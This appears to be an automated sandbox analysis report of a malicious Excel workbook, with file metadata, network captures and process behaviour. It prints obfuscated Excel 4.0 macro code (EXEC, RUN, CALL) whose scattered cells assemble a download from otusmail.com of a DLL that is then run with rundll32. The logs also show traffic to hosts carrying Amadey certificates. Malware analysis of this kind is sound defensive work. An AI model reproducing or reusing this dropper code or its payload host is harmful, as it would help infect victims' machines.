                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 288088
                                                                  General
                                                                  Stream Path:Book
                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                  Stream Size:288088
                                                                  Entropy:3.3163372394
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 3 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                  Macro 4.0 Code

                                                                  "=EXEC(Sheet2!BS64&Sheet2!BW70&Sheet2!BW71&Sheet2!BT63&Sheet2!BT64&Sheet2!BT65&Sheet2!BT66)=RUN(Sheet2!BI14)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)=IF(2+2+6<1,""gdf4gfdg5f1d8g1fd58g48fd415f"",""h4j4hg8k1j5g4d5f45df4jh5y1"")=ASIN(9887455421254)=ACOS(154151541)"
                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,otusmail.com/b/vegas.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bsdnbsej.dbw,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,JJ,run,",Plu",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CC,,gin,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,Init,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,dl,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,BB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                  "=COSH(5454645654654650)=ACOS(5.46546546884684E+22)=ASIN(64868468684684600)=COSH(68465454284548)=ACOS(5484512167481510000)=ASIN(15648451864516800)=COSH(4515155354615610000)=CALL(Sheet5!BF57&Sheet2!BP64&Sheet2!BN68&""o""&Sheet2!BN69,Sheet5!BC27&Sheet2!BP48&Sheet2!BP49&Sheet2!BQ66&Sheet2!BM49&Sheet2!BM50&Sheet2!BM51&Sheet2!BQ70&Sheet2!BQ71&Sheet2!BQ72&Sheet2!BQ73&""T""&Sheet2!BM77&Sheet2!BM78&Sheet2!BM79&Sheet2!BM80&Sheet2!BQ79&Sheet5!BB54,Sheet2!BR64&Sheet2!BR65&Sheet2!BR75,0,Sheet2!BU37&Sheet2!BU38&Sheet2!BU39&Sheet2!BU40,Sheet2!BT63,0,0)&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=RUN(Sheet4!AS11)=ASIN(4451548415151)=COSH(5454645654654650)=ACOS(5.46546546884684E+22)=ASIN(64868468684684600)=COSH(68465454284548)=ACOS(5484512167481510000)=ASIN(15648451864516800)=COSH(4515155354615610000)=ACOS(1.15154134535435E+24)&""""&""""&""""&""""&""""&"""""

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 4, 2021 01:13:17.530528069 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.584604979 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.584762096 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.595021009 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.647407055 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.651242018 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.651288033 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.651359081 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.651406050 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.698021889 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.751879930 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.752125025 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.752242088 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.770627975 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.824875116 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954245090 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954268932 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954291105 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954303026 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954319000 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954338074 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954355001 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954375982 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.954493999 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.954747915 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.955495119 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.955513000 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.955640078 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.956784010 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.956809998 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.956892967 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.958071947 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.958180904 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:17.976916075 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.976938009 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:17.977184057 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.012197018 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.012211084 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.012425900 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.012516975 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.012545109 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.012674093 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.013798952 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.013823032 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.013906002 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.015031099 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.015055895 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.015130997 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.016295910 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.016315937 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.016417980 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.017559052 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.017585039 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.017682076 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.018790007 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.018809080 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.018903017 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.020051003 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.020067930 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.020150900 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.021316051 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.021334887 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.021522999 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.022574902 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.022599936 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.022696972 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.023829937 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.023926020 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.035006046 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.035022974 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.035146952 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.035361052 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.035377979 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.035474062 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.035547972 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.069513083 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.069534063 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.069732904 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.069809914 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.069828033 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.069938898 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.070489883 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.070513964 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.070579052 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.071753025 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.071779966 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.071845055 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.071923971 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.073024035 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.073043108 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.073112965 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.074256897 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.074280024 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.074336052 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.074424028 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.075501919 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.075526953 CEST44349709104.21.64.132192.168.2.4
                                                                  May 4, 2021 01:13:18.075586081 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.075644970 CEST49709443192.168.2.4104.21.64.132
                                                                  May 4, 2021 01:13:18.076770067 CEST44349709104.21.64.132192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 4, 2021 01:13:00.727587938 CEST6519553192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:00.786514997 CEST53651958.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:17.447101116 CEST5904253192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:17.509002924 CEST53590428.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:20.502229929 CEST5648353192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:20.553493977 CEST53564838.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:24.910193920 CEST5102553192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:24.959079981 CEST53510258.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:26.321924925 CEST6151653192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:26.374690056 CEST53615168.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:27.635643005 CEST4918253192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:27.692507982 CEST53491828.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:28.637053013 CEST5992053192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:28.685787916 CEST53599208.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:30.125972033 CEST5745853192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:30.178047895 CEST53574588.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:31.222650051 CEST5057953192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:31.274199963 CEST53505798.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:32.235920906 CEST5170353192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:32.288701057 CEST53517038.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:33.330152035 CEST6524853192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:33.387725115 CEST53652488.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:34.458899021 CEST5372353192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:34.510404110 CEST53537238.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:36.028682947 CEST6464653192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:36.079252005 CEST53646468.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:37.086924076 CEST6529853192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:37.137885094 CEST53652988.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:38.326523066 CEST5912353192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:38.381735086 CEST53591238.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:39.429588079 CEST5453153192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:39.478370905 CEST53545318.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:40.586182117 CEST4971453192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:40.638150930 CEST53497148.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:41.945377111 CEST5802853192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:42.003473043 CEST53580288.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:43.052455902 CEST5309753192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:43.111682892 CEST53530978.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:44.285271883 CEST4925753192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:44.335665941 CEST53492578.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:45.413512945 CEST6238953192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:45.463510990 CEST53623898.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:46.539376974 CEST4991053192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:46.591114998 CEST53499108.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:47.714199066 CEST5585453192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:47.765872002 CEST53558548.8.8.8192.168.2.4
                                                                  May 4, 2021 01:13:58.273379087 CEST6454953192.168.2.48.8.8.8
                                                                  May 4, 2021 01:13:58.331209898 CEST53645498.8.8.8192.168.2.4
                                                                  May 4, 2021 01:14:13.404748917 CEST6315353192.168.2.48.8.8.8
                                                                  May 4, 2021 01:14:13.455368042 CEST53631538.8.8.8192.168.2.4
                                                                  May 4, 2021 01:14:14.218183994 CEST5299153192.168.2.48.8.8.8
                                                                  May 4, 2021 01:14:14.219389915 CEST5370053192.168.2.48.8.8.8
                                                                  May 4, 2021 01:14:14.282449961 CEST53529918.8.8.8192.168.2.4
                                                                  May 4, 2021 01:14:14.284641027 CEST53537008.8.8.8192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  May 4, 2021 01:13:17.447101116 CEST192.168.2.48.8.8.80x2792Standard query (0)otusmail.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  May 4, 2021 01:13:17.509002924 CEST8.8.8.8192.168.2.40x2792No error (0)otusmail.com104.21.64.132A (IP address)IN (0x0001)
                                                                  May 4, 2021 01:13:17.509002924 CEST8.8.8.8192.168.2.40x2792No error (0)otusmail.com172.67.151.10A (IP address)IN (0x0001)

                                                                  HTTPS Packets

                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                  May 4, 2021 01:13:17.651288033 CEST104.21.64.132443192.168.2.449709CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Apr 28 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Apr 28 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                  May 4, 2021 01:14:13.800282955 CEST18.222.240.99443192.168.2.449735CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATThu Apr 29 09:28:05 CEST 2021Fri Apr 29 09:28:05 CEST 2022771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,051c64c77e60f3980eea90869b68c58a8
                                                                  May 4, 2021 01:14:24.715645075 CEST54.163.9.216443192.168.2.449739CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATThu Apr 29 09:18:48 CEST 2021Fri Apr 29 09:18:48 CEST 2022771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,051c64c77e60f3980eea90869b68c58a8

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: EXCEL.EXE PID: 4944 Parent PID: 800

                                                                  General

                                                                  Start time:01:13:11
                                                                  Start date:04/05/2021
                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                  Imagebase:0x60000
                                                                  File size:27110184 bytes
                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: rundll32.exe PID: 4744 Parent PID: 4944

                                                                  General
